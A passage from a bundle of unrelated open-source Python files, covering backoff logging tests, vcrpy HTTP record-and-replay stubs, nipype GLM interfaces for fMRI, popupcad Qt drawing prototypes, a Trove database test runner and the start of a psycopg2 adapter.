backoff_log_level, giveup_log_level, max_tries
):
@backoff.on_predicate(
backoff.expo,
max_tries=max_tries,
backoff_log_level=backoff_log_level,
giveup_log_level=giveup_log_level,
)
def func():
return False
return func
@pytest.mark.parametrize(
("func_factory", "backoff_log_level", "giveup_log_level"),
(
(factory, backoff_log_level, giveup_log_level)
for backoff_log_level, giveup_log_level in itertools.product(
(
logging.DEBUG,
logging.INFO,
logging.WARNING,
logging.ERROR,
logging.CRITICAL,
),
repeat=2,
)
for factory in (_on_predicate_factory, _on_exception_factory)
)
)
def test_event_log_levels(
caplog, func_factory, backoff_log_level, giveup_log_level
):
max_tries = 3
func = func_factory(backoff_log_level, giveup_log_level, max_tries)
with unittest.mock.patch('time.sleep', return_value=None):
with caplog.at_level(
min(backoff_log_level, giveup_log_level), logger="backoff"
):
func()
backoff_re = re.compile("backing off", re.IGNORECASE)
giveup_re = re.compile("giving up", re.IGNORECASE)
backoff_log_count = 0
giveup_log_count = 0
for logger_name, level, message in caplog.record_tuples:
if level == backoff_log_level and backoff_re.match(message):
backoff_log_count += 1
elif level == giveup_log_level and giveup_re.match(message):
giveup_log_count += 1
assert backoff_log_count == max_tries - 1
assert giveup_log_count == 1
|
|
'''Stubs for patching HTTP and HTTPS requests'''
import logging
import six
from six.moves.http_client import (
HTTPConnection,
HTTPSConnection,
HTTPResponse,
)
from six import BytesIO
from vcr.request import Request
from vcr.errors import CannotOverwriteExistingCassetteException
from . import compat
log = logging.getLogger(__name__)
class VCRFakeSocket(object):
"""
A socket that doesn't do anything!
Used when playing back casssettes, when there
is no actual open socket.
"""
def close(self):
pass
def settimeout(self, *args, **kwargs):
pass
def fileno(self):
"""
This is kinda crappy. requests will watch
this descriptor and make sure it's not closed.
Return file descriptor 0 since that's stdin.
"""
return 0 # wonder how bad this is....
def parse_headers(header_list):
"""
Convert headers from our serialized dict with lists for keys to a
HTTPMessage
"""
header_string = b""
for key, values in header_list.items():
for v in values:
header_string += \
key.encode('utf-8') + b":" + v.encode('utf-8') + b"\r\n"
return compat.get_httpmessage(header_string)
def serialize_headers(response):
out = {}
for key, values in compat.get_headers(response.msg):
out.setdefault(key, [])
out[key].extend(values)
return out
class VCRHTTPResponse(HTTPResponse):
"""
Stub reponse class that gets returned instead of a HTTPResponse
"""
def __init__(self, recorded_response):
self.recorded_response = recorded_response
self.reason = recorded_response['status']['message']
self.status = self.code = recorded_response['status']['code']
self.version = None
self._content = BytesIO(self.recorded_response['body']['string'])
self._closed = False
headers = self.recorded_response['headers']
# Since we are loading a response that has already been serialized, our
# response is no longer chunked. That means we don't want any
# libraries trying to process a chunked response. By removing the
# transfer-encoding: chunked header, this should cause the downstream
# libraries to process this as a non-chunked response.
te_key = [h for h in headers.keys() if h.upper() == 'TRANSFER-ENCODING']
if te_key:
del headers[te_key[0]]
self.headers = self.msg = parse_headers(headers)
self.length = compat.get_header(self.msg, 'content-length') or None
@property
def closed(self):
# in python3, I can't change the value of self.closed. So I'
# twiddling self._closed and using this property to shadow the real
# self.closed from the superclas
return self._closed
def read(self, *args, **kwargs):
return self._content.read(*args, **kwargs)
def readline(self, *args, **kwargs):
return self._content.readline(*args, **kwargs)
def close(self):
self._closed = True
return True
def getcode(self):
return self.status
def isclosed(self):
return self.closed
def info(self):
return parse_headers(self.recorded_response['headers'])
def getheaders(self):
message = parse_headers(self.recorded_response['headers'])
return list(compat.get_header_items(message))
def getheader(self, header, default=None):
values = [v for (k, v) in self.getheaders() if k.lower() == header.lower()]
if values:
return ', '.join(values)
else:
return default
class VCRConnection(object):
# A reference to the cassette that's currently being patched in
cassette = None
def _port_postfix(self):
"""
Returns empty string for the default port and ':port' otherwise
"""
port = self.real_connection.port
default_port = {'https': 443, 'http': 80}[self._protocol]
return ':{0}'.format(port) if port != default_port else ''
def _uri(self, url):
"""Returns request absolute URI"""
uri = "{0}://{1}{2}{3}".format(
self._protocol,
self.real_connection.host,
self._port_postfix(),
url,
)
return uri
def _url(self, uri):
"""Returns request selector url from absolute URI"""
prefix = "{0}://{1}{2}".format(
self._protocol,
self.real_connection.host,
self._port_postfix(),
)
return uri.replace(prefix, '', 1)
def request(self, method, url, body=None, headers=None):
'''Persist the request metadata in self._vcr_request'''
self._vcr_request = Request(
method=method,
uri=self._uri(url),
body=body,
headers=headers or {}
)
log.debug('Got {0}'.format(self._vcr_request))
# Note: The request may not actually be finished at this point, so
# I'm not sending the actual request until getresponse(). This
# allows me to compare the entire length of the response to see if it
# exists in the cassette.
def putrequest(self, method, url, *args, **kwargs):
"""
httplib gives you more than one way to do it. This is a way
to start building up a request. Usually followed by a bunch
of putheader() calls.
"""
self._vcr_request = Request(
method=method,
uri=self._uri(url),
body="",
headers={}
)
log.debug('Got {0}'.format(self._vcr_request))
def putheader(self, header, *values):
self._vcr_request.headers[header] = values
def send(self, data):
'''
This method is called after request(), to add additional data to the
body of the request. So if that happens, let's just append the data
onto the most recent request in the cassette.
'''
self._vcr_request.body = self._vcr_request.body + data \
if self._vcr_request.body else data
def close(self):
# Note: the real connection will only close if it's open, so
# no need to check that here.
self.real_connection.close()
def endheaders(self, message_body=None):
"""
Normally, this would actually send the request to the server.
We are not sending the request until getting the response,
so bypass this part and just append the message body, if any.
"""
if message_body is not None:
self._vcr_request.body = message_body
def getresponse(self, _=False, **kwargs):
'''Retrieve the response'''
# Check to see if the cassette has a response for this request. If so,
# then return it
if self.cassette.can_play_response_for(self._vcr_request):
log.info(
"Playing response for {0} from cassette".format(
self._vcr_request
)
)
response = self.cassette.play_response(self._vcr_request)
return VCRHTTPResponse(response)
else:
if self.cassette.write_protected and self.cassette.filter_request(
self._vcr_request
):
raise CannotOverwriteExistingCassetteException(
"No match for the request (%r) was found. "
"Can't overwrite existing cassette (%r) in "
"your current record mode (%r)."
% (self._vcr_request, self.cassette._path,
self.cassette.record_mode)
)
# Otherwise, we should send the request, then get the response
# and return it.
log.info(
"{0} not in cassette, sending to real server".format(
self._vcr_request
)
)
# This is imported here to avoid circular import.
# TODO(@IvanMalison): Refactor to allow normal import.
from vcr.patch import force_reset
with force_reset():
self.real_connection.request(
method=self._vcr_request.method,
url=self._url(self._vcr_request.uri),
body=self._vcr_request.body,
headers=self._vcr_request.headers,
)
# get the response
response = self.real_connection.getresponse()
# put the response into the cassette
response = {
'status': {
'code': response.status,
'message': response.reason
},
'headers': serialize_headers(response),
'body': {'string': response.read()},
}
self.cassette.append(self._vcr_request, response)
return VCRHTTPResponse(response)
def set_debuglevel(self, *args, **kwargs):
self.real_connection.set_debuglevel(*args, **kwargs)
def connect(self, *args, **kwargs):
"""
httplib2 uses this. Connects to the server I'm assuming.
Only pass to the baseclass if we don't have a recorded response
and are not write-protected.
"""
if hasattr(self, '_vcr_request') and \
self.cassette.can_play_response_for(self._vcr_request):
# We already have a response we are going to play, don't
# actually connect
return
if self.cassette.write_protected:
# Cassette is write-protected, don't actually connect
return
return self.real_connection.connect(*args, **kwargs)
@property
def sock(self):
if self.real_connection.sock:
return self.real_connection.sock
return VCRFakeSocket()
@sock.setter
def sock(self, value):
if self.real_connection.sock:
self.real_connection.sock = value
def __init__(self, *args, **kwargs):
if six.PY3:
kwargs.pop('strict', None) # apparently this is gone in py3
# need to temporarily reset here because the real connection
# inherits from the thing that we are mocking out. Take out
# the reset if you want to see what I mean :)
from vcr.patch import force_reset
with force_reset():
self.real_connection = self._baseclass(*args, **kwargs)
def __setattr__(self, name, value):
"""
We need to define this because any attributes that are set on the
VCRConnection need to be propogated to the real connection.
For example, urllib3 will set certain attributes on the connection,
such as 'ssl_version'. These attributes need to get set on the real
connection to have the correct and expected behavior.
TODO: Separately setting the attribute on the two instances is not
ideal. We should switch to a proxying implementation.
"""
try:
setattr(self.real_connection, name, value)
except AttributeError:
# raised if real_connection has not been set yet, such as when
# we're setting the real_connection itself for the first time
pass
super(VCRConnection, self).__setattr__(name, value)
class VCRHTTPConnection(VCRConnection):
'''A Mocked class for HTTP requests'''
_baseclass = HTTPConnection
_protocol = 'http'
class VCRHTTPSConnection(VCRConnection):
'''A Mocked class for HTTPS requests'''
_baseclass = HTTPSConnection
_protocol = 'https'
is_verified = True
|
|
import warnings
import os
import nibabel as nb
import numpy as np
from nipype.external import six
from ...utils.misc import package_check
have_nipy = True
try:
package_check('nipy')
except Exception, e:
have_nipy = False
else:
import nipy.modalities.fmri.design_matrix as dm
import nipy.labs.glm.glm as GLM
if have_nipy:
try:
BlockParadigm = dm.BlockParadigm
except AttributeError:
from nipy.modalities.fmri.experimental_paradigm import BlockParadigm
from ..base import (BaseInterface, TraitedSpec, traits, File, OutputMultiPath,
BaseInterfaceInputSpec, isdefined)
class FitGLMInputSpec(BaseInterfaceInputSpec):
session_info = traits.List(minlen=1, maxlen=1, mandatory=True,
desc=('Session specific information generated by'
' ``modelgen.SpecifyModel``, FitGLM does '
'not support multiple runs uless they are '
'concatenated (see SpecifyModel options)'))
hrf_model = traits.Enum('Canonical', 'Canonical With Derivative', 'FIR',
desc=("that specifies the hemodynamic reponse "
"function it can be 'Canonical', 'Canonical "
"With Derivative' or 'FIR'"), usedefault=True)
drift_model = traits.Enum("Cosine", "Polynomial", "Blank",
desc = ("string that specifies the desired drift "
"model, to be chosen among 'Polynomial', "
"'Cosine', 'Blank'"), usedefault=True)
TR = traits.Float(mandatory=True)
model = traits.Enum("ar1", "spherical",
desc=("autoregressive mode is available only for the "
"kalman method"), usedefault=True)
method = traits.Enum("kalman", "ols",
desc=("method to fit the model, ols or kalma; kalman "
"is more time consuming but it supports "
"autoregressive model"), usedefault=True)
mask = traits.File(exists=True,
desc=("restrict the fitting only to the region defined "
"by this mask"))
normalize_design_matrix = traits.Bool(False,
desc=("normalize (zscore) the "
"regressors before fitting"),
usedefault=True)
save_residuals = traits.Bool(False, usedefault=True)
plot_design_matrix = traits.Bool(False, usedefault=True)
class FitGLMOutputSpec(TraitedSpec):
beta = File(exists=True)
nvbeta = traits.Any()
s2 = File(exists=True)
dof = traits.Any()
constants = traits.Any()
axis = traits.Any()
reg_names = traits.List()
residuals = traits.File()
a = File(exists=True)
class FitGLM(BaseInterface):
'''
Fit GLM model based on the specified design. Supports only single or concatenated runs.
'''
input_spec = FitGLMInputSpec
output_spec = FitGLMOutputSpec
def _run_interface(self, runtime):
session_info = self.inputs.session_info
functional_runs = self.inputs.session_info[0]['scans']
if isinstance(functional_runs, six.string_types):
functional_runs = [functional_runs]
nii = nb.load(functional_runs[0])
data = nii.get_data()
if isdefined(self.inputs.mask):
mask = nb.load(self.inputs.mask).get_data() > 0
else:
mask = np.ones(nii.shape[:3]) == 1
timeseries = data.copy()[mask,:]
del data
for functional_run in functional_runs[1:]:
nii = nb.load(functional_run)
data = nii.get_data()
npdata = data.copy()
del data
timeseries = np.concatenate((timeseries,npdata[mask,:]), axis=1)
del npdata
nscans = timeseries.shape[1]
if 'hpf' in session_info[0].keys():
hpf = session_info[0]['hpf']
drift_model=self.inputs.drift_model
else:
hpf=0
drift_model = "Blank"
reg_names = []
for reg in session_info[0]['regress']:
reg_names.append(reg['name'])
reg_vals = np.zeros((nscans,len(reg_names)))
for i in range(len(reg_names)):
reg_vals[:,i] = np.array(session_info[0]['regress'][i]['val']).reshape(1,-1)
frametimes= np.linspace(0, (nscans-1)*self.inputs.TR, nscans)
conditions = []
onsets = []
duration = []
for i,cond in enumerate(session_info[0]['cond']):
onsets += cond['onset']
conditions += [cond['name']]*len(cond['onset'])
if len(cond['duration']) == 1:
duration += cond['duration']*len(cond['onset'])
else:
duration += cond['duration']
if conditions:
paradigm = BlockParadigm(con_id=conditions, onset=onsets, duration=duration)
else:
paradigm = None
design_matrix, self._reg_names = dm.dmtx_light(frametimes, paradigm, drift_model=drift_model, hfcut=hpf,
hrf_model=self.inputs.hrf_model,
add_regs=reg_vals,
add_reg_names=reg_names
)
if self.inputs.normalize_design_matrix:
for i in range(len(self._reg_names)-1):
design_matrix[:,i] = (design_matrix[:,i]-design_matrix[:,i].mean())/design_matrix[:,i].std()
if self.inputs.plot_design_matrix:
import pylab
pylab.pcolor(design_matrix)
pylab.savefig("design_matrix.pdf")
pylab.close()
pylab.clf()
glm = GLM.glm()
glm.fit(timeseries.T, design_matrix, method=self.inputs.method, model=self.inputs.model)
self._beta_file = os.path.abspath("beta.nii")
beta = np.zeros(mask.shape + (glm.beta.shape[0],))
beta[mask,:] = glm.beta.T
nb.save(nb.Nifti1Image(beta, nii.get_affine()), self._beta_file)
self._s2_file = os.path.abspath("s2.nii")
s2 = np.zeros(mask.shape)
s2[mask] = glm.s2
nb.save(nb.Nifti1Image(s2, nii.get_affine()), self._s2_file)
if self.inputs.save_residuals:
explained = np.dot(design_matrix,glm.beta)
residuals = np.zeros(mask.shape + (nscans,))
residuals[mask,:] = timeseries - explained.T
self._residuals_file = os.path.abspath("residuals.nii")
nb.save(nb.Nifti1Image(residuals, nii.get_affine()), self._residuals_file)
self._nvbeta = glm.nvbeta
self._dof = glm.dof
self._constants = glm._constants
self._axis = glm._axis
if self.inputs.model == "ar1":
self._a_file = os.path.abspath("a.nii")
a = np.zeros(mask.shape)
a[mask] = glm.a.squeeze()
nb.save(nb.Nifti1Image(a, nii.get_affine()), self._a_file)
self._model = glm.model
self._method = glm.method
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
outputs["beta"] = self._beta_file
outputs["nvbeta"] = self._nvbeta
outputs["s2"] = self._s2_file
outputs["dof"] = self._dof
outputs["constants"] = self._constants
outputs["axis"] = self._axis
outputs["reg_names"] = self._reg_names
if self.inputs.model == "ar1":
outputs["a"] = self._a_file
if self.inputs.save_residuals:
outputs["residuals"] = self._residuals_file
return outputs
class EstimateContrastInputSpec(BaseInterfaceInputSpec):
contrasts = traits.List(
traits.Either(traits.Tuple(traits.Str,
traits.Enum('T'),
traits.List(traits.Str),
traits.List(traits.Float)),
traits.Tuple(traits.Str,
traits.Enum('T'),
traits.List(traits.Str),
traits.List(traits.Float),
traits.List(traits.Float)),
traits.Tuple(traits.Str,
traits.Enum('F'),
traits.List(traits.Either(traits.Tuple(traits.Str,
traits.Enum('T'),
traits.List(traits.Str),
traits.List(traits.Float)),
traits.Tuple(traits.Str,
traits.Enum('T'),
traits.List(traits.Str),
traits.List(traits.Float),
traits.List(traits.Float)))))),
desc="""List of contrasts with each contrast being a list of the form:
[('name', 'stat', [condition list], [weight list], [session list])]. if
session list is None or not provided, all sessions are used. For F
contrasts, the condition list should contain previously defined
T-contrasts.""", mandatory=True)
beta = File(exists=True, desc="beta coefficients of the fitted model",mandatory=True)
nvbeta = traits.Any(mandatory=True)
s2 = File(exists=True, desc="squared variance of the residuals",mandatory=True)
dof = traits.Any(desc="degrees of freedom", mandatory=True)
constants = traits.Any(mandatory=True)
axis = traits.Any(mandatory=True)
reg_names = traits.List(mandatory=True)
mask = traits.File(exists=True)
class EstimateContrastOutputSpec(TraitedSpec):
stat_maps = OutputMultiPath(File(exists=True))
z_maps = OutputMultiPath(File(exists=True))
p_maps = OutputMultiPath(File(exists=True))
class EstimateContrast(BaseInterface):
'''
Estimate contrast of a fitted model.
'''
input_spec = EstimateContrastInputSpec
output_spec = EstimateContrastOutputSpec
def _run_interface(self, runtime):
beta_nii = nb.load(self.inputs.beta)
if isdefined(self.inputs.mask):
mask = nb.load(self.inputs.mask).get_data() > 0
else:
mask = np.ones(beta_nii.shape[:3]) == 1
glm = GLM.glm()
nii = nb.load(self.inputs.beta)
glm.beta = beta_nii.get_data().copy()[mask,:].T
glm.nvbeta = self.inputs.nvbeta
glm.s2 = nb.load(self.inputs.s2).get_data().copy()[mask]
glm.dof = self.inputs.dof
glm._axis = self.inputs.axis
glm._constants = self.inputs.constants
reg_names = self.inputs.reg_names
self._stat_maps = []
self._p_maps = []
self._z_maps = []
for contrast_def in self.inputs.contrasts:
name = contrast_def[0]
_ = contrast_def[1]
contrast = np.zeros(len(reg_names))
for i, reg_name in enumerate(reg_names):
if reg_name in contrast_def[2]:
idx = contrast_def[2].index(reg_name)
contrast[i] = contrast_def[3][idx]
est_contrast = glm.contrast(contrast)
stat_map = np.zeros(mask.shape)
stat_map[mask] = est_contrast.stat().T
stat_map_file = os.path.abspath(name + "_stat_map.nii")
nb.save(nb.Nifti1Image(stat_map, nii.get_affine()), stat_map_file)
self._stat_maps.append(stat_map_file)
p_map = np.zeros(mask.shape)
p_map[mask] = est_contrast.pvalue().T
p_map_file = os.path.abspath(name + "_p_map.nii")
nb.save(nb.Nifti1Image(p_map, nii.get_affine()), p_map_file)
self._p_maps.append(p_map_file)
z_map = np.zeros(mask.shape)
z_map[mask] = est_contrast.zscore().T
z_map_file = os.path.abspath(name + "_z_map.nii")
nb.save(nb.Nifti1Image(z_map, nii.get_affine()), z_map_file)
self._z_maps.append(z_map_file)
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
outputs["stat_maps"] = self._stat_maps
outputs["p_maps"] = self._p_maps
outputs["z_maps"] = self._z_maps
return outputs
|
|
# -*- coding: utf-8 -*-
"""
Written by Daniel M. Aukes.
Email: danaukes<at>seas.harvard.edu.
Please see LICENSE.txt for full license.
"""
import PySide.QtCore as qc
import PySide.QtGui as qg
from popupcad.graphics2d.graphicsitems import Common, CommonShape
from popupcad.geometry.vertex import ShapeVertex
from popupcad.filetypes.genericshapes import GenericPoly, GenericPolyline, GenericLine, GenericCircle, GenericTwoPointRect
import popupcad
class Proto(Common):
z_value = 20
isDeletable = True
minradius = 20
basicpen = qg.QPen(
qg.QColor.fromRgbF(
0,
0,
0,
1),
1.0,
qc.Qt.SolidLine,
qc.Qt.RoundCap,
qc.Qt.RoundJoin)
basicpen.setCosmetic(True)
basicbrush = qg.QBrush(
qg.QColor.fromRgbF(
1, 1, 0, .25), qc.Qt.SolidPattern)
nobrush = qc.Qt.NoBrush
def __init__(self, *args, **kwargs):
super(Proto, self).__init__(*args, **kwargs)
self.setZValue(self.z_value)
self.generic = self.shape_class([], [], False)
self.temphandle = None
self.setAcceptHoverEvents(True)
self.setFlag(self.ItemIsMovable, True)
self.setFlag(self.ItemIsSelectable, True)
self.setFlag(self.ItemIsFocusable, True)
self.setPen(self.basicpen)
self.setBrush(self.basicbrush)
def painterpath(self):
ep = self.exteriorpoints(popupcad.view_scaling)
ip = self.generic.interiorpoints(scaling=popupcad.view_scaling)
return self.generic.gen_painterpath(ep, ip)
def exteriorpoints(self,scaling=1):
ep = self.generic.exteriorpoints(scaling=scaling)
if self.temphandle is not None:
ep.append(
self.temphandle.generic.getpos(scaling=scaling))
return ep
def deltemphandle(self):
if not not self.temphandle:
self.temphandle.setParentItem(None)
del self.temphandle
self.temphandle = None
def checkdist(self, point0, point1):
return not popupcad.algorithms.points.twopointsthesame(
point0,
point1,
self.minradius /
self.scene().views()[0].zoom())
def finish_definition(self):
scene = self.scene()
self.deltemphandle()
scene.addItem(self.generic.outputinteractive())
self.harddelete()
scene.childfinished()
def mousedoubleclick(self, point):
if self.generic.is_valid_bool():
self.finish_definition()
self.updateshape()
def mouserelease(self, point):
pass
def mousemove(self, point):
import numpy
point = tuple(numpy.array(point.toTuple()) / popupcad.view_scaling)
if not not self.temphandle:
self.temphandle.generic.setpos(point)
self.temphandle.updateshape()
self.updateshape()
class ProtoMultiPoint(Proto):
def addhandle(self, handle):
if self.generic.len_exterior() == 0:
self.generic.addvertex_exterior(handle.get_generic())
self.temphandle = None
else:
if handle.generic.getpos(scaling=popupcad.view_scaling) != self.generic.get_exterior(
)[-1].getpos(scaling=popupcad.view_scaling):
if self.checkdist(handle.generic.getpos(scaling=popupcad.view_scaling),
self.generic.get_exterior()[-1].getpos(scaling=popupcad.view_scaling)):
self.generic.addvertex_exterior(handle.get_generic())
self.temphandle = None
def mousepress(self, point):
import numpy
point = tuple(numpy.array(point.toTuple()) / popupcad.view_scaling)
if not self.temphandle:
a = ShapeVertex(point)
self.temphandle = a.gen_interactive()
self.temphandle.setParentItem(self)
self.temphandle.updatescale()
self.addhandle(self.temphandle)
else:
self.addhandle(self.temphandle)
if not self.temphandle:
a = ShapeVertex(point)
self.temphandle = a.gen_interactive()
self.temphandle.setParentItem(self)
self.temphandle.updatescale()
self.updateshape()
# def mousedoubleclick(self, point):
# if self.generic.csg_valid() and self.generic.isValid():
# if self.generic.len_exterior() > 2:
# self.finish_definition()
# self.updateshape()
class ProtoTwoPoint(Proto):
def addhandle(self, handle):
if self.generic.len_exterior() == 0:
self.generic.addvertex_exterior(handle.get_generic())
self.temphandle = None
return True
elif self.generic.len_exterior() == 1:
if handle.pos().toTuple(
) != self.generic.get_exterior()[-1].getpos():
if self.checkdist(handle.generic.getpos(scaling=popupcad.view_scaling),
self.generic.get_exterior()[-1].getpos(scaling=popupcad.view_scaling)):
self.generic.addvertex_exterior(handle.get_generic())
self.temphandle = None
return True
else:
raise Exception
self.temphandle = None
return True
def mousepress(self, point):
import numpy
point = tuple(numpy.array(point.toTuple()) / popupcad.view_scaling)
if not self.temphandle:
a = ShapeVertex(point)
self.temphandle = a.gen_interactive()
self.temphandle.setParentItem(self)
self.temphandle.updatescale()
if self.generic.len_exterior() == 0:
self.addhandle(self.temphandle)
a = ShapeVertex(point)
self.temphandle = a.gen_interactive()
self.temphandle.setParentItem(self)
self.temphandle.updatescale()
self.updateshape()
return
elif self.generic.len_exterior() == 1:
if self.addhandle(self.temphandle):
self.finish_definition()
self.updateshape()
return
else:
return
else:
raise Exception
self.finish_definition()
self.updateshape()
return
self.updateshape()
class ProtoPoly(ProtoMultiPoint, CommonShape, qg.QGraphicsPathItem):
shape_class = GenericPoly
class ProtoPath(ProtoMultiPoint, CommonShape, qg.QGraphicsPathItem):
basicbrush = Proto.nobrush
shape_class = GenericPolyline
class ProtoLine(ProtoTwoPoint, CommonShape, qg.QGraphicsPathItem):
basicbrush = Proto.nobrush
shape_class = GenericLine
class ProtoCircle(ProtoTwoPoint, CommonShape, qg.QGraphicsPathItem):
shape_class = GenericCircle
class ProtoRect2Point(ProtoTwoPoint, CommonShape, qg.QGraphicsPathItem):
shape_class = GenericTwoPointRect
|
|
# Copyright 2015 Tesora Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from proboscis import SkipTest
from trove.common import exception
from trove.common.utils import poll_until
from trove.tests.scenario.runners.test_runners import TestRunner
from troveclient.compat import exceptions
class DatabaseActionsRunner(TestRunner):
def __init__(self):
super(DatabaseActionsRunner, self).__init__()
self.db_defs = []
@property
def first_db_def(self):
if self.db_defs:
return self.db_defs[0]
raise SkipTest("No valid database definitions provided.")
@property
def non_existing_db_def(self):
db_def = self.test_helper.get_non_existing_database_definition()
if db_def:
return db_def
raise SkipTest("No valid database definitions provided.")
def run_databases_create(self, expected_http_code=202):
databases = self.test_helper.get_valid_database_definitions()
if databases:
self.db_defs = self.assert_databases_create(
self.instance_info.id, databases, expected_http_code)
else:
raise SkipTest("No valid database definitions provided.")
def assert_databases_create(self, instance_id, serial_databases_def,
expected_http_code):
self.auth_client.databases.create(instance_id, serial_databases_def)
self.assert_client_code(expected_http_code)
self._wait_for_database_create(instance_id, serial_databases_def)
return serial_databases_def
def run_databases_list(self, expected_http_code=200):
self.assert_databases_list(
self.instance_info.id, self.db_defs, expected_http_code)
def assert_databases_list(self, instance_id, expected_database_defs,
expected_http_code, limit=2):
full_list = self.auth_client.databases.list(instance_id)
self.assert_client_code(expected_http_code)
listed_databases = {database.name: database for database in full_list}
self.assert_is_none(full_list.next,
"Unexpected pagination in the list.")
for database_def in expected_database_defs:
database_name = database_def['name']
self.assert_true(
database_name in listed_databases,
"Database not included in the 'database-list' output: %s" %
database_name)
# Check that the system (ignored) databases are not included in the
# output.
system_databases = self.get_system_databases()
self.assert_false(
any(name in listed_databases for name in system_databases),
"System databases should not be included in the 'database-list' "
"output.")
# Test list pagination.
list_page = self.auth_client.databases.list(instance_id, limit=limit)
self.assert_client_code(expected_http_code)
self.assert_true(len(list_page) <= limit)
if len(full_list) > limit:
self.assert_is_not_none(list_page.next, "List page is missing.")
else:
self.assert_is_none(list_page.next, "An extra page in the list.")
marker = list_page.next
self.assert_pagination_match(list_page, full_list, 0, limit)
if marker:
last_database = list_page[-1]
expected_marker = last_database.name
self.assert_equal(expected_marker, marker,
"Pagination marker should be the last element "
"in the page.")
list_page = self.auth_client.databases.list(
instance_id, marker=marker)
self.assert_client_code(expected_http_code)
self.assert_pagination_match(
list_page, full_list, limit, len(full_list))
def _wait_for_database_create(self, instance_id, expected_database_defs):
expected_db_names = {db_def['name']
for db_def in expected_database_defs}
self.report.log("Waiting for all created databases to appear in the "
"listing: %s" % expected_db_names)
def _all_exist():
all_dbs = self._get_db_names(instance_id)
return all(db in all_dbs for db in expected_db_names)
try:
poll_until(_all_exist, time_out=self.GUEST_CAST_WAIT_TIMEOUT_SEC)
self.report.log("All databases now exist on the instance.")
except exception.PollTimeOut:
self.fail("Some databases were not created within the poll "
"timeout: %ds" % self.GUEST_CAST_WAIT_TIMEOUT_SEC)
def _get_db_names(self, instance_id):
full_list = self.auth_client.databases.list(instance_id)
return {database.name: database for database in full_list}
def run_database_create_with_no_attributes(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_databases_create_failure(
self.instance_info.id, {}, expected_exception, expected_http_code)
def run_database_create_with_blank_name(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_databases_create_failure(
self.instance_info.id, {'name': ''},
expected_exception, expected_http_code)
def run_existing_database_create(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_databases_create_failure(
self.instance_info.id, self.first_db_def,
expected_exception, expected_http_code)
def assert_databases_create_failure(
self, instance_id, serial_databases_def,
expected_exception, expected_http_code):
self.assert_raises(
expected_exception,
expected_http_code,
self.auth_client.databases.create,
instance_id,
serial_databases_def)
def run_system_database_create(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
# TODO(pmalik): Actions on system users and databases should probably
# return Forbidden 403 instead. The current error messages are
# confusing (talking about a malformed request).
system_databases = self.get_system_databases()
database_defs = [{'name': name} for name in system_databases]
if system_databases:
self.assert_databases_create_failure(
self.instance_info.id, database_defs,
expected_exception, expected_http_code)
def run_database_delete(self, expected_http_code=202):
for database_def in self.db_defs:
self.assert_database_delete(
self.instance_info.id, database_def['name'],
expected_http_code)
def assert_database_delete(
self,
instance_id,
database_name,
expected_http_code):
self.auth_client.databases.delete(instance_id, database_name)
self.assert_client_code(expected_http_code)
self._wait_for_database_delete(instance_id, database_name)
def _wait_for_database_delete(self, instance_id, deleted_database_name):
self.report.log("Waiting for deleted database to disappear from the "
"listing: %s" % deleted_database_name)
def _db_is_gone():
all_dbs = self._get_db_names(instance_id)
return deleted_database_name not in all_dbs
try:
poll_until(_db_is_gone, time_out=self.GUEST_CAST_WAIT_TIMEOUT_SEC)
self.report.log("Database is now gone from the instance.")
except exception.PollTimeOut:
self.fail("Database still listed after the poll timeout: %ds" %
self.GUEST_CAST_WAIT_TIMEOUT_SEC)
def run_nonexisting_database_delete(self, expected_http_code=202):
# Deleting a non-existing database is expected to succeed as if the
# database was deleted.
self.assert_database_delete(
self.instance_info.id, self.non_existing_db_def['name'],
expected_http_code)
def run_system_database_delete(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
# TODO(pmalik): Actions on system users and databases should probably
# return Forbidden 403 instead. The current error messages are
# confusing (talking about a malformed request).
system_databases = self.get_system_databases()
if system_databases:
for name in system_databases:
self.assert_database_delete_failure(
self.instance_info.id, name,
expected_exception, expected_http_code)
def assert_database_delete_failure(
self, instance_id, database_name,
expected_exception, expected_http_code):
self.assert_raises(expected_exception, expected_http_code,
self.auth_client.databases.delete,
instance_id, database_name)
def get_system_databases(self):
return self.get_datastore_config_property('ignore_dbs')
|
|
# vi: ts=8 sts=4 sw=4 et
#
# dbpsycopg2.py: psycopg2 database adapter
#
# This file is part of Draco2. Draco2 is free software and is made available
# under the MIT license. Consult the file "LICENSE" that is distributed
# together with this file for the exact licensing terms.
#
# Draco2 is copyright (c) 1999-2007 by the Draco2 authors. See the file
# "AUTHORS" for a complete overview.
#
# $Revision: 1187 $
import re
import decimal
import psycopg2
import psycopg2.extensions as ppgext
from draco2.database import *
from draco2.database.manager import DatabaseManager
from draco2.database.dialect import DatabaseDialect
ppgext.register_type(ppgext.UNICODE)
# This is really a horrible HACK.
#
# There are serious problems in which mod_python uses multiple interpreters.
# The problems are such that one can ask himself whether this actually means
# that mod_python and the way it uses multiple interpreters is fundamentaly
# flawed and unfixable.
#
# See this these postings:
#
# - http://www.mail-archive.com/[email protected]/msg20175.html
# - http://mail.python.org/pipermail/python-list/2004-January/244343.html
#
# The summary is that extension modules are not really guaranteed to work as
# expected with multiple interpreters. For pure Python modules, each
# interpreter has a copy of that module. For C extension modules, there is one
# copy only that is shared between all interpreters. This means that extension
# modules cannot use global static variables.
#
# Psycopg caches the type of the "decimal" module for typecasting purposes.
# Because the decimal type is a pure python type, this means that this python
# type (which is specific to the interpreter that first loaded psycopg) will
# now be shared with other, non-related interpreters. This causes problems,
# one of them being that isinstance(decimal, object) will only work in the
# first interpreter.
#
# The horrible HACK we do here is to compile psycopg without support for the
# Decimal type, and we register our own pure Python type conversion routines.
# In these routines we re-import the decimal type (appears to be necessary,
# don't understand fully why) and return the _correct_ decimal type for the
# current interpreter. Fortunately the other typecasting types used by
# psycopg are C types and therefore do not have this problem.
def cast_decimal(value, cursor):
"""SQL NUMERIC -> Python Decimal."""
